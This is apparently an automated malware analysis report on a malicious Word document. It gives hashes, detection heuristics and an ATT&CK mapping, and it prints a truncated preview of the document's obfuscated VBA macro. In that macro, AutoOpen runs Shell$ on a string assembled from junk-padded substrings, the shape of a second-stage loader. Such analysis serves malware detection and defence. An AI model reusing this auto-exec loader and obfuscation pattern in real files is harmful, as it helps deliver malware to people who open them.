Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 294da0127d2a2b6a…

MALICIOUS

Office (OLE)

145.0 KB Created: 2017-11-20 10:27:00 Authoring application: Microsoft Office Word First seen: 2017-11-29
MD5: be5d25297c479f43e7eaf0897e0bf942 SHA-1: 717947590305b9a84870a119bd81895a5602cd19 SHA-256: 294da0127d2a2b6aa1beed973285c01413aa72a11baa10ee9660944751eafec4
304 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

This OLE document contains obfuscated VBA macros, including an AutoOpen macro that utilizes the Shell() function to execute a payload. The macro appears to be a loader for a second-stage payload, as indicated by the use of Shell() and the obfuscated string manipulation within the YQjKOKhJi function. The ClamAV detection also flags this as a macro-based obfuscation malware.

Heuristics 9

  • ClamAV: Doc.Macro.Obfuscation-6355576-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Obfuscation-6355576-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 159928 bytes
SHA-256: 5f9ef9c7b6880c95e339635e4135b04b99dbfe7bf0e8e6c7f1276c455a3daee9
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 96 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "nGihlOOBr"
Sub AutoOpen()
RizCKHTFk = Array("drwdwdrH", "qKNpwfYk", "qtlPWlYA", "twqHbTOD", "zoTduKQF")
hJfWwWUzb = Array("RUOipOsT", "wjAmkfWw", "JqHLupjc", "jiMFCBXb", "rjJzAVJa")
bKwaQSziJ = Array("ZpjMohco", "lBHCmQwM", "ZvDVXwnj", "hkjtFMNl", "iwdLrODz")
Shell$ YQjKOKhJi, 0
hLPUCYouz = Array("OqXtIldC", "zfDziiYo", "VTpnlUKs", "EnMhTiJv", "ptqVqsZL")
zJrjzBzcq = Array("fjEwGOtj", "ioVYwiUV", "IHorCzdu", "inbcbtCo", "jqnzFwif")
zpLDEmDaX = Array("NqtKloiD", "JTTmREll", "jpFvWQLZ", "IuMmZqsk", "BFNCIiwB")
End Sub
Function YQjKOKhJi()
UTbQzdoUaIb = "7a8TvKWwYzHLWZWhTwYEMDMwRYCFSHTnvaRwPJVIamCAHBlXHszjrQYjzRiwpujQjTPvHYRKcQdZBMoQnfzaHnwfBlzwaXSjGlUompQjbpDamzfndSKKzGJtXjtVZSkFzzTPrAdwPNwSjVtCGMVHMIjAbbQCwuJIEzcpfPvcoMvjHjP0z5pWvZRi"
IRoHjiLzwAv = Mid(UTbQzdoUaIb, 8, 166)
omtdU = Array("UPwpHflj", "GcJQlzFq", "mTcFtGZl", "GzFRMJMo", "WhYzNkYl")
KMmnvAH = Array("srCJKHLF", "EBquwzEO", "pKiHZUUw", "QVuDaHcB", "vrNCEQbz")
tGAcDjPqbck = "BzKzfTBBBsWhwCCYwcHjTtRijqnISGBLRvFBLWOaWjbBGNCsOrqwJwPGjfPojtjurKQBwANZOhKkRPYVoutaPCBVjwUfGZtcAjKvzBvOdQjclipRHuAlzIioJuVzfiTonhjlFdYnzfwzTYjBJDXMZIdrBVlCfwiuzvodlDA1n7i1bn8P1Z0MY69rqWnRCpkvkZ"
ipjVPWHzSij = Mid(tGAcDjPqbck, 2, 162)
hTtPUsw = Array("dXbRzZzi", "fofzWmlf", "UQmdSnka", "zjUSzmQN", "bvLqjNzz")
AOqDzjujzi = Array("qUYzWLCv", "woEqWAfq", "mARPEjht", "YRXbbvwG", "SmmzOnEo")
rRYibfTmL = "in3aUMFcNEqQGiBzKTXWcarwuPvVsJirVHRwXKFLpQGhhsRhmvKJATJIRlYORFYEazvzNDbAOLhMUKPCzNiwwUqBzIhmlqukrCGhwSUjUKvpmzoHWVREWcFFJtBEWpOYQwUSDhFftzcoYBPAUaPQZqNPwAXCRPNiwXYpcVDoQmKXARhIiAjwZwwajFVCKCOdlzsBcZYwWbznfqszjAOO5FBwjCsAib5TSC"
wIKfUPtzzkc = Mid(rRYibfTmL, 9, 198)
AZrfAbYY = Array("azMHrSKk", "rcKiOwAG", "EQUkBGMh", "sFjSzPzO", "TbipOMMW")
LHDodXhYwC = Array("mnslWtkz", "ccawEbwT", "liPmjrlc", "fvOnULrs", "EzzOObLw")
SHsVdzZMYp = "EnRHWbTldsYjQmPOiAhmmTdttuEtjKiTlzEatZiCQkstzZvcSbInAPvzVXObXaCSKFzSioVJRiVBbkuUzbaHBuSWBFFVLHfqhZitbcuiFzVWttYlctcvzuRQnaRdiz2uZnU5Iq7DrHUf54TAQ5RFUrj"
RJicVUfR = Mid(SHsVdzZMYp, 3, 124)
tNEZp = Array("lVIJGGui", "KCMwWkTX", "IYlGJEPz", "GuRjIptn", "capJoUKi")
YBrfjqXCufN = Array("oNvaVGni", "ztoddhVh", "GKCLoNVV", "JYWvuJjo", "NGRwIocA")
cFWbRojAC = "YW9GAQnisiX6MSrJBqqPNzctpOSoQjbBUDqNltDWrQsSAMztjROMFfwLbEmbNaftNKafQiYImTYwFKsdOZEwww8lTjRwjAwfsWiM"
Fpdvkoh = Mid(cFWbRojAC, 15, 70)
KZNKqRJnutY = Array("ObqlHFWO", "QqEiXjQP", "uvFAAnff", "klvPvjwm", "FXhIACjD")
YhKTqaMzH = Array("dBFYUptC", "moLizTtb", "wKBVKHTh", "uScAwHOr", "OBXzhGLu")
miNEbOQKT = "aTbJBSP1KVPfTPYQfREzYzGXABiNXjlCYjfEckZwwLusqpiuizwUsuci31PfNdAuzw"
ZFBjdpwYL = Mid(miNEbOQKT, 11, 46)
hdmZjL = Array("jqXsvYqD", "IBRJbIhw", "pwjDuoqj", "MWqtjaqV", "OwWWVKjB")
dSJIKquCa = Array("dPptcjOq", "ZfdjfGlr", "znjZizXi", "LwvcmKdi", "OfZizzHc")
sJZPPHjChj = "YWnfrUbdknEunbVOEUoDspqVqZzwrZdqootmitmwNtDPDYhYZbWaWSNuVMrRVcmKJNFwhjjLirqzmaRSsaYQCDTVawQSBUakHsFqSirqrLsfbOGYMrAAFpjBj1"
KTZSaLJob = Mid(sJZPPHjChj, 5, 106)
cwbKUttiT = Array("GnPImuAE", "NslrOaoV", "vEzzsqaF", "lVCaskDX", "WhaAWwcH")
aWAOAlzIPbr = Array("zMmoVBnF", "PwnYWkIP", "MJWRsaMd", "pOVhAowz", "crBfDmjk")
BZArTT = "GBTsGzjPpumfWbzzJJOAwdsiNGPYOGqCiOWMVaPYozsYpzXcRLbmwDQazajzijZCrjBIEmijupMwlTtNimHCfEEbzwPvuPtHaqjGwPXihssIrRpdjSRrZWWniZKIXioivEYvmnOTOdUmLwkjGlObwBiETtbYEPGzDNMmturtI7Jdo2FUJ2"
WTSDRrdw = Mid(BZArTT, 11, 158)
wwpntNB = Array("NjIqAlaR", "cdfumcEc", "skwIiVCw", "wMnmcSIi", "cptwzOaN")
XurqAiPXdN = Array("NiBFwRoz", "iFDiUXbs", "jLrnznoK", "UzRzjHid", "JjuETwzh")
wSLmG = "fiBFzztFNoZ9APjQrfJKlsWSKSAhDinPPFazlCiIiJzcMsckGKjmjbmotYIQHNHidJqzGbioBBccvtGSqPaszAioSmGMuNAVBPzCBiiijulizJtASpasmPjcbCiUVStnAHbftDQLlvMEOEpItGtFnIi7upjhlsARK61Kr"
UYhjh = Mid(wSLmG, 16, 136)
Ductad = Array("jMkhqsGX", "TUObLzhi", "bdwpJbcq", "cjaMXHsX", "wtPnGjjh")
tWQjMqsDOs = Array("TzSIIwXM", "cjjEVFhH", "jtFJStzL
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.